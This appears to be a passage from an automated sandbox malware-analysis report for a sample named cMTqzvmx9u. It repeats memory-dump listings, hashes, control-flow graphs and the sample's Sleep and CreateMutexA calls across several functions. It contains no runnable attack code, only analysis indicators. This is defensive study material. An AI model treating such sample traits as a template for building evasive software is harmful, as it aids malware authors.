                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: ae0fc6957b3346cf95873e019d27ec76d1c7258eaf6a53c0fb8ba70fd5effdbc
                                                                                                                                                                                                                              • Instruction ID: 5f875813b2a59b544ab6a47add996fea3c13b61e8038448792023f43ac75e2f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae0fc6957b3346cf95873e019d27ec76d1c7258eaf6a53c0fb8ba70fd5effdbc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4312E317043009BEB08DB78DCC5BADBFE5EFD6314F248A98E414972D1CB7599808752
                                                                                                                                                                                                                              Function 00B0A682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 421 b0a682-b0a6a2 425 b0a6d0-b0a6ec 421->425 426 b0a6a4-b0a6b0 421->426 429 b0a71a-b0a739 425->429 430 b0a6ee-b0a6fa 425->430 427 b0a6b2-b0a6c0 426->427 428 b0a6c6-b0a6cd call b1d663 426->428 427->428 433 b0a949 427->433 428->425 431 b0a767-b0a916 call b180c0 429->431 432 b0a73b-b0a747 429->432 435 b0a710-b0a717 call b1d663 430->435 436 b0a6fc-b0a70a 430->436 438 b0a749-b0a757 432->438 439 b0a75d-b0a764 call b1d663 432->439 441 b0a94e 433->441 442 b0a949 call b36c6a 433->442 435->429 436->433 436->435 438->433 438->439 439->431 447 b0a953-b0a994 Sleep CreateMutexA 441->447 448 b0a94e call b36c6a 441->448 442->441 453 b0a996-b0a998 447->453 454 b0a9a7-b0a9a8 447->454 448->447 453->454 455 b0a99a-b0a9a5 453->455 455->454
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: e814b0496d216fa0338e517034894ba13caffc4f07596cbf13d9fd76873dde81
                                                                                                                                                                                                                              • Instruction ID: 1019dcbcbd3c2b9c4dea2be03c728c4517d814612013635973bab2d7654a5c1a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e814b0496d216fa0338e517034894ba13caffc4f07596cbf13d9fd76873dde81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44311631B043009BEB08DBB8DC89BADBFF6DBC6314F248A98E014972D1C77599808662
                                                                                                                                                                                                                              Function 00B09ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 457 b09adc-b09ae8 458 b09aea-b09af8 457->458 459 b09afe-b09b27 call b1d663 457->459 458->459 460 b0a917 458->460 467 b09b55-b09b57 459->467 468 b09b29-b09b35 459->468 462 b0a953-b0a994 Sleep CreateMutexA 460->462 463 b0a917 call b36c6a 460->463 471 b0a996-b0a998 462->471 472 b0a9a7-b0a9a8 462->472 463->462 469 b09b65-b09d91 call b17a00 call b05c10 call b08b30 call b18220 call b17a00 call b05c10 call b08b30 call b18220 467->469 470 b09b59-b0a916 call b180c0 467->470 473 b09b37-b09b45 468->473 474 b09b4b-b09b52 call b1d663 468->474 471->472 476 b0a99a-b0a9a5 471->476 473->460 473->474 474->467 476->472
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 96317c3c95a3b3b1e464bf428a9151baa445f442c82050896ef5d7dab758795e
                                                                                                                                                                                                                              • Instruction ID: 1e84fd2e1dc9e24b3a446f8e666188d8585ebcf1c538c8adda50f39dbe851f1a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96317c3c95a3b3b1e464bf428a9151baa445f442c82050896ef5d7dab758795e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A32129317043009BFB189BA8DCC5B6CBBE2EBC6310F244699E514972E5DBB599808651
                                                                                                                                                                                                                              Function 00B0A856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 534 b0a856-b0a86e 535 b0a870-b0a87c 534->535 536 b0a89c-b0a89e 534->536 537 b0a892-b0a899 call b1d663 535->537 538 b0a87e-b0a88c 535->538 539 b0a8a0-b0a8a7 536->539 540 b0a8a9-b0a8b1 call b07d30 536->540 537->536 538->537 541 b0a94e 538->541 543 b0a8eb-b0a916 call b180c0 539->543 551 b0a8b3-b0a8bb call b07d30 540->551 552 b0a8e4-b0a8e6 540->552 547 b0a953-b0a987 Sleep CreateMutexA 541->547 548 b0a94e call b36c6a 541->548 553 b0a98e-b0a994 547->553 548->547 551->552 559 b0a8bd-b0a8c5 call b07d30 551->559 552->543 555 b0a996-b0a998 553->555 556 b0a9a7-b0a9a8 553->556 555->556 558 b0a99a-b0a9a5 555->558 558->556 559->552 563 b0a8c7-b0a8cf call b07d30 559->563 563->552 566 b0a8d1-b0a8d9 call b07d30 563->566 566->552 569 b0a8db-b0a8e2 566->569 569->543
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491932263.0000000000B62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492031917.0000000000B69000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492060237.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492116701.0000000000B77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492902730.0000000000CD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492941886.0000000000CD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1492982609.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493261720.0000000000CF4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1493380270.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494514811.0000000000D04000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1494780820.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495235481.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495342055.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495373748.0000000000D2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495402068.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495505572.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495534808.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495627938.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495652519.0000000000D6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495687030.0000000000D6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1495713711.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497347599.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497389998.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497412986.0000000000D7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497519087.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497563417.0000000000D91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1497825837.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499175427.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499222301.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499451305.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499481554.0000000000DFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499521188.0000000000E07000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499554456.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499590597.0000000000E16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1499622151.0000000000E17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_b00000_cMTqzvmx9u.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: ceaf61947819bed737cd84b026b80656727b30b21467fc513c25d23d465b6129
                                                                                                                                                                                                                              • Instruction ID: 8cf01dd537fcc58afa2661a11d8555649afc4111dfadc4be27d0c3ccf5f06143
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceaf61947819bed737cd84b026b80656727b30b21467fc513c25d23d465b6129
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78214F717493019BF724A768889677DBFD1EF81300F244DE6E505D62D1CF7959808193
                                                                                                                                                                                                                              Function 00B0A34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 511 b0a34f-b0a35b 512 b0a371-b0a39a call b1d663 511->512 513 b0a35d-b0a36b 511->513 519 b0a3c8-b0a916 call b180c0 512->519 520 b0a39c-b0a3a8 512->520 513->512 514 b0a93a 513->514 516 b0a953-b0a994 Sleep CreateMutexA 514->516 517 b0a93a call b36c6a 514->517 526 b0a996-b0a998 516->526 527 b0a9a7-b0a9a8 516->527 517->516 521 b0a3aa-b0a3b8 520->521 522 b0a3be-b0a3c5 call b1d663 520->522 521->514 521->522 522->519 526->527 530 b0a99a-b0a9a5 526->530 530->527
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00B0A963
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00B63254), ref: 00B0A981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1491909891.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
